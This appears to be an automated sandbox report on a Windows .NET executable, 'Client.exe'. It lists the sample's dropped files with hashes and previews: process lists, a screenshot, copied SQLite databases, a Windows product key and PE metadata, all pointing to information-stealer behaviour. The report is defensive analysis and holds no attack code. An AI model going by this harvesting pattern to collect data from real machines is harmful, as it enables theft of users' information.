                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):282
                                                      Entropy (8bit):3.5191090305155277
                                                      Encrypted:false
                                                      SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                      MD5:3A37312509712D4E12D27240137FF377
                                                      SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                      SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                      SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                      Malicious:false
                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):190
                                                      Entropy (8bit):3.5497401529130053
                                                      Encrypted:false
                                                      SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                      MD5:D48FCE44E0F298E5DB52FD5894502727
                                                      SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                      SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                      SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                      Malicious:false
                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):190
                                                      Entropy (8bit):3.5497401529130053
                                                      Encrypted:false
                                                      SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                      MD5:87A524A2F34307C674DBA10708585A5E
                                                      SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                      SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                      SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                      Malicious:false
                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):504
                                                      Entropy (8bit):3.514398793376306
                                                      Encrypted:false
                                                      SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                      MD5:29EAE335B77F438E05594D86A6CA22FF
                                                      SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                      SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                      SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                      Malicious:false
                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):19356
                                                      Entropy (8bit):5.735985178932741
                                                      Encrypted:false
                                                      SSDEEP:384:80uSlhiUGbnWtM2+Rq8RbPhZlLfo7oKOLbMVxPcDMc+i+Ghm+xtbm0eh2bvIOhJm:80uSlhiUGbnWtM2+Rq8RbPhZlLfo7oKZ
                                                      MD5:2C3C0DC011D8134FE0288ECE49B61849
                                                      SHA1:E67D702CFE032F53766A4D930902E3E4464A4F77
                                                      SHA-256:61C88A165ED49BDB620D7FB49EDBDE92D37189CD830C289942DD4F7D8B6DE26D
                                                      SHA-512:E35BA3451659E2F45750F23DFAD72D5479B8D166F7D99EC37F471A14C81145521EB3160E2700678C7F553A76C112FD0BE732133E07442002F605E594F70B844F
                                                      Malicious:false
                                                      Preview:NAME: EkZRFPdQQNSXEvGWL..PID: 2580..EXE: C:\Program Files (x86)\brEQlsCWWaguuSRzFbGDWAFcFUPWcwHXpJZKHbKTLEYnJrlYGMpRruqgFjNmuBYacPrXbbrkrkQF\EkZRFPdQQNSXEvGWL.exe..NAME: spoolsv..PID: 2148..EXE: C:\Windows\System32\spoolsv.exe..NAME: EkZRFPdQQNSXEvGWL..PID: 5164..EXE: C:\Program Files (x86)\brEQlsCWWaguuSRzFbGDWAFcFUPWcwHXpJZKHbKTLEYnJrlYGMpRruqgFjNmuBYacPrXbbrkrkQF\EkZRFPdQQNSXEvGWL.exe..NAME: svchost..PID: 3008..EXE: C:\Windows\System32\svchost.exe..NAME: RuntimeBroker..PID: 4300..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: svchost..PID: 1040..EXE: C:\Windows\system32\svchost.exe..NAME: ctfmon..PID: 3676..EXE: C:\Windows\system32\ctfmon.exe..NAME: svchost..PID: 6016..EXE: C:\Windows\system32\svchost.exe..NAME: csrss..PID: 412..EXE: ..NAME: svchost..PID: 1704..EXE: C:\Windows\System32\svchost.exe..NAME: EkZRFPdQQNSXEvGWL..PID: 1880..EXE: C:\Program Files (x86)\brEQlsCWWaguuSRzFbGDWAFcFUPWcwHXpJZKHbKTLEYnJrlYGMpRruqgFjNmuBYacPrXbbrkrkQF\EkZRFPdQQNSXEvGWL.exe..NAME: EkZRFPdQQNSXEv
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):29
                                                      Entropy (8bit):3.9093680639438846
                                                      Encrypted:false
                                                      SSDEEP:3:rPkuX8IRndy:rPT8Ky
                                                      MD5:737AD7B70E324ECD18DBD7393494ADF4
                                                      SHA1:711E10BA4837F28264A93FE2412EAA77F5B77089
                                                      SHA-256:6EBE515DEB02482C10780C0982B701BF34EEA164F3DF48DB29C08D45C9FC288B
                                                      SHA-512:1664506364710EAAD7F313F1E53D552DFFC93AC195314FF9A74433A66E1E5CF4965A84448309A90001919CF255001926C208028A9A88762516669113063BA9CA
                                                      Malicious:false
                                                      Preview:DBP42-QXNP3-3F2RK-WK7XY-4B8KX
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):84
                                                      Entropy (8bit):4.6630509827051725
                                                      Encrypted:false
                                                      SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                      MD5:58CD2334CFC77DB470202487D5034610
                                                      SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                      SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                      SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                      Malicious:false
                                                      Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):15719
                                                      Entropy (8bit):5.6590315626336585
                                                      Encrypted:false
                                                      SSDEEP:384:cH8xYkW094GOUTlc8e1bpvL4aebrccBSgTNiayOgv20BvrwEuxG2exZIbmH4hwep:cH8xYkW094GOUTlc8e1bpvL4aebrccB3
                                                      MD5:FE19BCFE7EDEA625836B5A0204D54257
                                                      SHA1:4AFF096E5E8A21698F3EA1F404C155F9C7CC871A
                                                      SHA-256:BA3B26F8D9D12169DF29F81ECBF9FC7E141FF7110749648CA914DDDE83679CF7
                                                      SHA-512:CA8F412A73C09A791F8B8752E46879C8C6D25A2DFE50750799AEF05622063FF8BA051D7C05008DA00E8B32D5675B57121A7C9C07423EEA29657CD669EAC36B80
                                                      Malicious:false
                                                      Preview:NAME: EkZRFPdQQNSXEvGWL..TITLE: New Tab - Google Chrome..PID: 2580..EXE: C:\Program Files (x86)\brEQlsCWWaguuSRzFbGDWAFcFUPWcwHXpJZKHbKTLEYnJrlYGMpRruqgFjNmuBYacPrXbbrkrkQF\EkZRFPdQQNSXEvGWL.exe..NAME: EkZRFPdQQNSXEvGWL..TITLE: New Tab - Google Chrome..PID: 5164..EXE: C:\Program Files (x86)\brEQlsCWWaguuSRzFbGDWAFcFUPWcwHXpJZKHbKTLEYnJrlYGMpRruqgFjNmuBYacPrXbbrkrkQF\EkZRFPdQQNSXEvGWL.exe..NAME: EkZRFPdQQNSXEvGWL..TITLE: New Tab - Google Chrome..PID: 1880..EXE: C:\Program Files (x86)\brEQlsCWWaguuSRzFbGDWAFcFUPWcwHXpJZKHbKTLEYnJrlYGMpRruqgFjNmuBYacPrXbbrkrkQF\EkZRFPdQQNSXEvGWL.exe..NAME: EkZRFPdQQNSXEvGWL..TITLE: New Tab - Google Chrome..PID: 2992..EXE: C:\Program Files (x86)\brEQlsCWWaguuSRzFbGDWAFcFUPWcwHXpJZKHbKTLEYnJrlYGMpRruqgFjNmuBYacPrXbbrkrkQF\EkZRFPdQQNSXEvGWL.exe..NAME: EkZRFPdQQNSXEvGWL..TITLE: New Tab - Google Chrome..PID: 5996..EXE: C:\Program Files (x86)\brEQlsCWWaguuSRzFbGDWAFcFUPWcwHXpJZKHbKTLEYnJrlYGMpRruqgFjNmuBYacPrXbbrkrkQF\EkZRFPdQQNSXEvGWL.exe..NAME: EkZRFPdQQNSXEv
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                      Category:dropped
                                                      Size (bytes):97659
                                                      Entropy (8bit):7.88199553136295
                                                      Encrypted:false
                                                      SSDEEP:1536:Cf6RmiKKnJCEoQ62jCAUlWWlhIUu4uXsvJIoz9YaINlRiFx2F/E3IevWm5UzH/hH:y6RmiKrEoB22FlWW7PyCJ3z9YaINlMFK
                                                      MD5:D1F9B4AAD3AD2CFC03566B71DF77F207
                                                      SHA1:5B7400864BF8AE87B16014B288DD6B46B6070786
                                                      SHA-256:694897764DBB3AE24D6C60D9240483627BE670F2FF789306BFE4CFEA4AD9C821
                                                      SHA-512:F0DEB8D8430197B347540CDF18D22277743072BBDFDAC0C1A3024512F1FE3E5ADCF1BAD66029036F67E3421504D87966D240881D6D50E33E1740B129BB4C0C65
                                                      Malicious:false
                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(....~....[.....).....+.F"8x{I.t.p....pj.g.Ez..+..........O.Wz.......\..4;?...O.........QA..Z.DqCr.Y...L....V..\A.
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):5242880
                                                      Entropy (8bit):0.0357803477377646
                                                      Encrypted:false
                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                      MD5:76D181A334D47872CD2E37135CC83F95
                                                      SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                      SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                      SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                      Category:dropped
                                                      Size (bytes):106496
                                                      Entropy (8bit):1.136471148832945
                                                      Encrypted:false
                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                      MD5:37B1FC046E4B29468721F797A2BB968D
                                                      SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                      SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                      SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                      Category:dropped
                                                      Size (bytes):40960
                                                      Entropy (8bit):0.8553638852307782
                                                      Encrypted:false
                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                      Category:dropped
                                                      Size (bytes):159744
                                                      Entropy (8bit):0.5394293526345721
                                                      Encrypted:false
                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                      Category:dropped
                                                      Size (bytes):159744
                                                      Entropy (8bit):0.5394293526345721
                                                      Encrypted:false
                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                      Category:dropped
                                                      Size (bytes):106496
                                                      Entropy (8bit):1.136471148832945
                                                      Encrypted:false
                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                      MD5:37B1FC046E4B29468721F797A2BB968D
                                                      SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                      SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                      SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1239949490932863
                                                      Encrypted:false
                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                      MD5:271D5F995996735B01672CF227C81C17
                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1239949490932863
                                                      Encrypted:false
                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                      MD5:271D5F995996735B01672CF227C81C17
                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):51200
                                                      Entropy (8bit):0.8745947603342119
                                                      Encrypted:false
                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                      Category:dropped
                                                      Size (bytes):155648
                                                      Entropy (8bit):0.5407252242845243
                                                      Encrypted:false
                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                      Category:dropped
                                                      Size (bytes):98304
                                                      Entropy (8bit):0.08235737944063153
                                                      Encrypted:false
                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):5242880
                                                      Entropy (8bit):0.0357803477377646
                                                      Encrypted:false
                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                      MD5:76D181A334D47872CD2E37135CC83F95
                                                      SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                      SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                      SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):5
                                                      Entropy (8bit):1.9219280948873623
                                                      Encrypted:false
                                                      SSDEEP:3:F:F
                                                      MD5:36D5CC212651E265D436849C1CC2476F
                                                      SHA1:7714D4E35E2D73DC0397A54DCF261C13246DF4AA
                                                      SHA-256:089766CE192FC97B47472C2B26B6B230B5C94B48B1E5D36037A2C379C8208037
                                                      SHA-512:ED40394090D4646B18AEAE1457462B30C3B79191468E47AD41D23716155AB2785DFE8CAE3DE127BB31D4A42CBD999090160AF20B167729FACE9D9285E063994A
                                                      Malicious:false
                                                      Preview:81098
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):5.925602117452437
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:Client.exe
                                                      File size:174'080 bytes
                                                      MD5:e29ab30e42348ecf2831928b7b95d5d8
                                                      SHA1:70ae302ae078326efbe444fd8158d2b104a06a69
                                                      SHA256:58b1013f511e61f2ddfb547939895ec161ab8bc03f5413529f85f1a3272d38d4
                                                      SHA512:34a3209dc0856ea0e4d0573eca4dd53b238ebb317f10cb84683d99c64c1264693390d42193fcbac190ce9d9e0a33c9f32de8c4a57e4d38ec267ad16ad5d3138d
                                                      SSDEEP:3072:3+STW8djpN6izj8mZw0YaeiJFqIPu/i9bVJ2cxO06+Wpz:c8XN6W8mm0YmfXPSi9bDD
                                                      TLSH:AE04281437E81929E3FFCBB8F4B002158B72F823A917E76F199458EE2D62354D550BB2
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g............"...0.............n.... ........@.. ....................................`................................
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0x42bd6e
